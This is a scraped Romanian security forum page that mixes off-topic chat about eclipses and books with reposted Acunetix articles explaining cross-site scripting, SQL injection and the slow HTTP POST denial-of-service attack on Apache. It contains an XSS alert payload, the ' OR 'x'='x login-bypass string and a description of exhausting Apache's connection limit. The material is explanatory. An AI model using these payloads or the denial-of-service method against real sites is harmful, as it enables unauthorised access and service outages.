Da, sunt sigur ca nu ajuta sa te uiti la soare cu ochiul liber, dar dupa logica mea e mult mai grav sa te uiti la soare cu ochiul liber decat la eclipsa. Bine, probabil ca se considera ca la eclipsa te uiti 2 ore, asa da.

Nu am inteles niciodata de ce orbesti daca te uiti cu ochiul liber. Cand eram mai mic stiu ca incercam sa ma uit la soare cu ochiul liber, cateva secunde si tot repetam aceasta actiune. Si nu am probleme cu ochii, nu port ochelari, nu ma dor... Oricum, mersi de informatii, sper sa nu uit de ea. Poate o sa fac si cateva poze.

Asta e o prostie: $message = str_replace("\\"","",$message);// filtreaza ghilimelele $message = str_replace("\\\'","",$message);// filtreaza doar o parte a ghilimelelor Cred ca trebuia: $message = str_replace('"',"",$message);// filtreaza ghilimelele $message = str_replace("'","",$message);// filtreaza doar o parte a ghilimelelor am insertat kodul v-a redicta pe pagina-exploit, unde v-a indeplini kodul dat Nici nu ma stresez sa il citesc, doar m-am uitat peste el. Gasiti articole despre XSS mult mai bune daca dati un Search la Tutoriale Engleza.

Sincer, cred ca as cumpara-o. Adica e o poveste interesanta, ca un fel de film de actiune. Imi place ca are si niste idei originale. Oricum, sfarsitul mi-a placut. Cred ca se poate cumpara, daca aveti fonduri de sarbatori. Nu pot sa spun despre ce e vorba. As strica totul, nu ar mai avea nici un farmec. Voi doar plecati de la ideea ca muriti daca o cititi si o sa va placa.

Am citit-o eu. A aparut si volumul II, dar pe acela inca nu l-am citit. Sincer, nu e cine stie ce. Limbajul nu e tocmai unul prezent in literatura clasica, e mult mai "modern". E genul de carte pe care o poate citi oricine. Eu am citit-o intr-o zi. Are 300-400 de pagini, cam asa. In format electronic nu stiu daca o gasesti, e prin librarii in schimb.

Deci o sectiune mai generala de securitate, discutii tehnice? Daca da, e perfect, sunt complet de acord.

Nu tie, daca mai comentati aiurea si va abateti de la subiect primiti ban.

What is Cross site Scripting? Hackers are constantly experimenting with a wide repertoire of hacking techniques to compromise websites and web applications and make off with a treasure trove of sensitive data including credit card numbers, social security numbers and even medical records. Cross Site Scripting (also known as XSS or CSS) is generally believed to be one of the most common application layer hacking techniques. In general, cross-site scripting refers to that hacking technique that leverages vulnerabilities in the code of a web application to allow an attacker to send malicious content from an end-user and collect some type of data from the victim. Today, websites rely heavily on complex web applications to deliver different output or content to a wide variety of users according to set preferences and specific needs. This arms organizations with the ability to provide better value to their customers and prospects. However, dynamic websites suffer from serious vulnerabilities rendering organizations helpless and prone to cross site scripting attacks on their data. "A web page contains both text and HTML markup that is generated by the server and interpreted by the client browser. Web sites that generate only static pages are able to have full control over how the browser interprets these pages. Web sites that generate dynamic pages do not have complete control over how their outputs are interpreted by the client. The heart of the issue is that if mistrusted content can be introduced into a dynamic page, neither the web site nor the client has enough information to recognize that this has happened and take protective actions." (CERT Coordination Center). Cross Site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems. The data is usually formatted as a hyperlink containing malicious content and which is distributed over any possible means on the internet. As a hacking tool, the attacker can formulate and distribute a custom-crafted CSS URL just by using a browser to test the dynamic website response. The attacker also needs to know some HTML, JavaScript and a dynamic language, to produce a URL which is not too suspicious-looking, in order to attack a XSS vulnerable website. Any web page which passes parameters to a database can be vulnerable to this hacking technique. Usually these are present in Login forms, Forgot Password forms, etc… N.B. Often people refer to Cross Site Scripting as CSS or XSS, which is can be confused with Cascading Style Sheets (CSS). Is your site vulnerable to Cross Site Scripting Our experience leads us to conclude that the cross-site scripting vulnerability is one of the most highly widespread flaw on the Internet and will occur anywhere a web application uses input from a user in the output it generates without validating it. Our own research shows that over a third of the organizations applying for our free audit service are vulnerable to Cross Site Scripting. And the trend is upward. Example of a Cross Site Scripting attack As a simple example, imagine a search engine site which is open to an XSS attack. The query screen of the search engine is a simple single field form with a submit button. Whereas the results page, displays both the matched results and the text you are looking for. Example: Search Results for "XSS Vulnerability" To be able to bookmark pages, search engines generally leave the entered variables in the URL address. In this case the URL would look like: http://test.searchengine.com/search.php?q=XSS%20 Vulnerability Next we try to send the following query to the search engine: <script type="text/javascript"> alert('This is an XSS Vulnerability') </script> By submitting the query to search.php, it is encoded and the resulting URL would be something like: http://test.searchengine.com/search.php?q=%3Cscript%3Ealert%28%91This%20is%20an%20XSS%20Vulnerability%92%29%3C%2Fscript%3E Upon loading the results page, the test search engine would probably display no results for the search but it will display a JavaScript alert which was injected into the page by using the XSS vulnerability. How to check for Cross site scripting vulnerabilities To check for Cross site scripting vulnerabilities, use a Web Vulnerability Scanner. A Web Vulnerability Scanner crawls your entire website and automatically checks for Cross Site Scripting vulnerabilities. It will indicate which URLs/scripts are vulnerable to these attacks so that you can fix the vulnerability easily. Besides Cross site scripting vulnerabilities a web application scanner will also check for SQL injection & other web vulnerabilities. Acunetix Web Vulnerability Scanner scans for SQL injection, Cross site scripting, Google hacking and many more vulnerabilities. Preventing Cross Site Scripting attacks To prevent these attacks, dangerous characters must be filtered out from the web application inputs. These should be filtered out both in their ASCII and HEX values. Scanning for XSS vulnerabilities with Acunetix WVS Free Edition! To check whether your website has cross site scripting vulnerabilities, download the Free Edition from Cross Site Scripting scanner ? Free XSS Security Scanner. This version will scan any website / web application for XSS vulnerabilities and it will also reveal all the essential information related to it, such as the vulnerability location and remediation techniques. Scanning for XSS is normally a quick exercise (depending on the size of the web-site). Sursa: Cross site scripting / XSS - How to find & fix it with a web scanner

SQL Injection: What is it? SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most common application layer attack techniques used today. It is the type of attack that takes advantage of improper coding of your web applications that allows hacker to inject SQL commands into say a login form to allow them to gain access to the data held within your database. In essence, SQL Injection arises because the fields available for user input allow SQL statements to pass through and query the database directly. SQL Injection: An In-depth Explanation Web applications allow legitimate website visitors to submit and retrieve data to/from a database over the Internet using their preferred web browser. Databases are central to modern websites – they store data needed for websites to deliver specific content to visitors and render information to customers, suppliers, employees and a host of stakeholders. User credentials, financial and payment information, company statistics may all be resident within a database and accessed by legitimate users through off-the-shelf and custom web applications. Web applications and databases allow you to regularly run your business. SQL Injection is the hacking technique which attempts to pass SQL commands (statements) through a web application for execution by the backend database. If not sanitized properly, web applications may result in SQL Injection attacks that allow hackers to view information from the database and/or even wipe it out. Such features as login pages, support and product request forms, feedback forms, search pages, shopping carts and the general delivery of dynamic content, shape modern websites and provide businesses with the means necessary to communicate with prospects and customers. These website features are all examples of web applications which may be either purchased off-the-shelf or developed as bespoke programs. These website features are all susceptible to SQL Injection attacks which arise because the fields available for user input allow SQL statements to pass through and query the database directly. SQL Injection: A Simple Example Take a simple login page where a legitimate user would enter his username and password combination to enter a secure area to view his personal details or upload his comments in a forum. When the legitimate user submits his details, an SQL query is generated from these details and submitted to the database for verification. If valid, the user is allowed access. In other words, the web application that controls the login page will communicate with the database through a series of planned commands so as to verify the username and password combination. On verification, the legitimate user is granted appropriate access. Through SQL Injection, the hacker may input specifically crafted SQL commands with the intent of bypassing the login form barrier and seeing what lies behind it. This is only possible if the inputs are not properly sanitised (i.e., made invulnerable) and sent directly with the SQL query to the database. SQL Injection vulnerabilities provide the means for a hacker to communicate directly to the database. The technologies vulnerable to this attack are dynamic script languages including ASP, ASP.NET, PHP, JSP, and CGI. All an attacker needs to perform an SQL Injection hacking attack is a web browser, knowledge of SQL queries and creative guess work to important table and field names. The sheer simplicity of SQL Injection has fuelled its popularity. Why is it possible to pass SQL queries directly to a database that is hidden behind a firewall and any other security mechanism? Firewalls and similar intrusion detection mechanisms provide little or no defense against full-scale SQL Injection web attacks. Since your website needs to be public, security mechanisms will allow public web traffic to communicate with your web application/s (generally over port 80/443). The web application has open access to the database in order to return (update) the requested (changed) information. In SQL Injection, the hacker uses SQL queries and creativity to get to the database of sensitive corporate data through the web application. SQL or Structured Query Language is the computer language that allows you to store, manipulate, and retrieve data stored in a relational database (or a collection of tables which organise and structure data). SQL is, in fact, the only way that a web application (and users) can interact with the database. Examples of relational databases include Oracle, Microsoft Access, MS SQL Server, MySQL, and Filemaker Pro, all of which use SQL as their basic building blocks. SQL commands include SELECT, INSERT, DELETE and DROP TABLE. DROP TABLE is as ominous as it sounds and in fact will eliminate the table with a particular name. In the legitimate scenario of the login page example above, the SQL commands planned for the web application may look like the following: SELECT count(*) FROM users_list_table WHERE username=’FIELD_USERNAME’ AND password=’FIELD_PASSWORD” In plain English, this SQL command (from the web application) instructs the database to match the username and password input by the legitimate user to the combination it has already stored. Each type of web application is hard coded with specific SQL queries that it will execute when performing its legitimate functions and communicating with the database. If any input field of the web application is not properly sanitised, a hacker may inject additional SQL commands that broaden the range of SQL commands the web application will execute, thus going beyond the original intended design and function. A hacker will thus have a clear channel of communication (or, in layman terms, a tunnel) to the database irrespective of all the intrusion detection systems and network security equipment installed before the physical database server. Is my database at risk to SQL Injection? SQL Injection is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against SQL Injection, there are a large number of web applications that remain vulnerable. According to the Web Application Security Consortium (WASC) 9% of the total hacking incidents reported in the media until 27th July 2006 were due to SQL Injection. More recent data from our own research shows that about 50% of the websites we have scanned this year are susceptible to SQL Injection vulnerabilities. It may be difficult to answer the question whether your web site and web applications are vulnerable to SQL Injection especially if you are not a programmer or you are not the person who has coded your web applications. Our experience leads us to believe that there is a significant chance that your data is already at risk from SQL Injection. Whether an attacker is able to see the data stored on the database or not, really depends on how your website is coded to display the results of the queries sent. What is certain is that the attacker will be able to execute arbitrary SQL Commands on the vulnerable system, either to compromise it or else to obtain information. If improperly coded, then you run the risk of having your customer and company data compromised. What an attacker gains access to also depends on the level of security set by the database. The database could be set to restrict to certain commands only. A read access normally is enabled for use by web application back ends. Even if an attacker is not able to modify the system, he would still be able to read valuable information. What is the impact of SQL Injection? Once an attacker realizes that a system is vulnerable to SQL Injection, he is able to inject SQL Query / Commands through an input form field. This is equivalent to handing the attacker your database and allowing him to execute any SQL command including DROP TABLE to the database! An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to manipulate existing queries, to UNION (used to select related information from two tables) arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system. Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures, it could spell disaster. Unfortunately the impact of SQL Injection is only uncovered when the theft is discovered. Data is being unwittingly stolen through various hack attacks all the time. The more expert of hackers rarely get caught. Example of a SQLInjection Attack Here is a sample basic HTML form with two inputs, login and password. <form method="post" action="http://testasp.vulnweb.com/login.asp"> <input name="tfUName" type="text" id="tfUName"> <input name="tfUPass" type="password" id="tfUPass"> </form> The easiest way for the login.asp to work is by building a database query that looks like this: SELECT id FROM logins WHERE username = '$username' AND password = '$password’ If the variables $username and $password are requested directly from the user's input, this can easily be compromised. Suppose that we gave "Joe" as a username and that the following string was provided as a password: anything' OR 'x'='x SELECT id FROM logins WHERE username = 'Joe' AND password = 'anything' OR 'x'='x' As the inputs of the web application are not properly sanitised, the use of the single quotes has turned the WHERE SQL command into a two-component clause. The 'x'='x' part guarantees to be true regardless of what the first part contains. This will allow the attacker to bypass the login form without actually knowing a valid username / password combination! How do I prevent SQL Injection attacks? Firewalls and similar intrusion detection mechanisms provide little defense against full-scale web attacks. Since your website needs to be public, security mechanisms will allow public web traffic to communicate with your databases servers through web applications. Isn’t this what they have been designed to do? Patching your servers, databases, programming languages and operating systems is critical but will in no way the best way to prevent SQL Injection Attacks. How to check for SQL injection vulnerabilities Securing your website and web applications from SQL Injection involves a three-part process: 1. Analysing the present state of security present by performing a thorough audit of your website and web applications for SQL Injection and other hacking vulnerabilities. 2. Making sure that you use coding best practice santising your web applications and all other components of your IT infrastructure. 3. Regularly performing a web security audit after each change and addition to your web components. Furthermore, the principles you need to keep in mind when checking for SQL Injection and all other hacking techniques are the following: “Which parts of a website we thought are secure are open to hack attacks?” and “what data can we throw at an application to cause it to perform something it shouldn’t do?”. Checking for SQL Injection vulnerabilities involves auditing your website and web applications. Manual vulnerability auditing is complex and very time-consuming. It also demands a high-level of expertise and the ability to keep track of considerable volumes of code and of all the latest tricks of the hacker’s ‘trade’. The best way to check whether your web site and applications are vulnerable to SQL injection attacks is by using an automated and heuristic web vulnerability scanner. An automated web vulnerability scanner crawls your entire website and should automatically check for vulnerabilities to SQL Injection attacks. It will indicate which URLs/scripts are vulnerable to SQL injection so that you can immediately fix the code. Besides SQL injection vulnerabilities a web application scanner will also check for Cross site scripting and other web vulnerabilities. Signature-Matching versus Heuristic Scanning for SQL Injection Whereas many organisations understand the need for automating and regularising web auditing, few appreciate the necessity of scanning both off-the-shelf AND bespoke web applications. The general misconception is these custom web applications are not vulnerable to hacking attacks. This arises more out of the “it can never happen to me” phenomenon and the confidence website owners place in their developers. A search on Google News returned 240 matches on the keyword “SQL Injection” (at time of writing). Secunia and SecuObs report dozens of vulnerabilities of known web applications on a daily basis. Yet, examples of hacked custom applications are rarely cited in the media. This is because it is only the known organisations (e.g. Choicepoint, AT&T, PayPal) that hit the headlines over the past few months. It is critical to understand that custom web applications are probably the most vulnerable and definitely attract the greatest number of hackers simply because they know that such applications do not pass through the rigorous testing and quality assurance processes of off-the-shelf ones. This means that scanning a custom web application with only a signature-based scanner will not pinpoint vulnerabilities to SQL Injection and any other hacking techniques. Establishing and testing against a database of signatures of vulnerabilities for known applications is not enough. This is passive auditing because it will only cover off-the-shelf applications and any vulnerabilities to new hacking techniques will not be discovered. In addition, signature matching would do little when a hacker launches an SQL Injection attack on your custom web applications. Hack attacks are not based on signature file testing – hackers understand that known applications, systems and servers are being updated and secured constantly and consistently by respective vendors. It is custom applications that are the proverbial honey pot. It is only a handful of products that deploy rigorous and heuristic technologies to identify the real threats. True automated web vulnerability scanning almost entirely depends on (a) how well your site is crawled to establish its structure and various components and links, and ( on the ability of the scanner to leverage intelligently the various hacking methods and techniques against your web applications. It would be useless to detect the known vulnerabilities of known applications alone. A significant degree of heuristics is involved in detecting vulnerabilities since hackers are extremely creative and launch their attacks against bespoke web applications to create maximum impact. How can Acunetix help you in auditing your site for SQL Injection? Acunetix was founded to combat the alarming rise in web attacks including SQL Injection and Cross-Site Scripting among others. Take a product tour to find out how Acunetix Web Vulnerability Scanner can help you or download the scanner today! Sursa: SQL Injection - Use a SQL Injection Scanner to Fix It

HTTP Post Denial Of Service: more dangerous than initially thought by Bogdan Calin on November 22, 2010 – 8:47 pm Wong Onn Chee and Tom Brennan from OWASP recently published a paper* presenting a new denial of service attack against web servers. What’s special about this denial of service attack is that it’s very hard to fix because it relies on a generic problem in the way HTTP protocol works. Therefore, to properly fix it would mean to break the protocol, and that’s certainly not desirable. The authors are listing some possible workarounds but in my opinion none of them really fixes the problem. The attack explained An attacker establishes a number of connections with the web servers. Each one of these connections contains a Content-Length header with a large number (e.g. Content-Length: 10000000). Therefore, the web server will expect 10000000 bytes from each one of these connections. The trick is not to send all this data at once but to send it character by character over a long period of time (e.g. 1 character each 10-100 seconds). The web server will keep these connections open for a very long time, until it receives all the data. In this time, other clients will have a hard time connecting to the server, or even worse will not be able to connect at all because all the available connections are taken/busy. In this blog post, I would like to expand on the effect of this denial of service attack against Apache. First, I would like to start with one of their affirmations: “Hence, any website which has forms, i.e. accepts HTTP POST requests, is susceptible to such attacks.” At least in the case of Apache, this is not correct. It doesn’t matter if the website has forms or not. Any Apache web server is vulnerable to this attack. The web server doesn’t decide if the resource can accept POST data before receiving the full request. I’ve created a very simple Acunetix WVS test script to reproduce this attack and prove this point: The script will create 256 sockets, establish a TCP connection to the web server on each socket and start sending data slowly (1 character per second). Screenshot: http://www.acunetix.com/blog/wp-content/uploads/2010/11/wvs-scripting1.png As you can see in the code from the screen-shot, I’m making a HTTP POST request to an nonexistent file (POST /aaaaaaaaaaaa HTTP/1.1). After a few seconds, the web server becomes completely unresponsive. As soon as I stop the script, the web server starts responding again. Therefore, any Apache web server is vulnerable to this attack. How many connections are required until the web server stops responding? Their paper mentions 20.000 connections as an example. They also make the following note: Apache requires lesser number of connections due to mandatory client or thread limit in httpd.conf. Interesting. How much lesser number of connections? If we look in the Apache 1.3 documentation, we find the following information: The MaxClients directive sets the limit on the number of simultaneous requests that can be supported; not more than this number of child server processes will be created. Syntax: MaxClients number Default: MaxClients 256 Therefore, by default Apache 1.3 only allows 256 connections. Therefore, an attacker only needs to steal 256 connections before the web server stops responding. It’s the same situation even with Apache 2.0. During my tests, I noticed the following error message in the Apache error log: $tail -f /var/log/apache2/error.log [Mon Nov 22 15:23:17 2010] [notice] Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g configured — resuming normal operations [Mon Nov 22 15:24:46 2010] [error] server reached MaxClients setting, consider raising the MaxClients setting In conclusion, the denial of service attack affects any Apache web server and one requires only a few hundred connections to make the server completely unresponsive. And based on my knowledge there is no proper fix for it: Apache response was: “What you described is a known attribute (read: flaw) of the HTTP protocol over TCP/IP. The Apache HTTP project declines to treat this expected use-case as a vulnerability in the software.” And Microsoft’s response: “While we recognize this is an issue, this issue does not meet our bar for the release of a security update. We will continue to track this issue and the changes I mentioned above for release in a future service pack.” That’s pretty scary! * The paper published by Wong Onn Chee and Tom Brennan can be found here: http://www.owasp.org/images/4/43/Layer_7_DDOS.pdf Sursa: HTTP Post Denial Of Service: more dangerous than initially thought | Acunetix Web Application Security Blog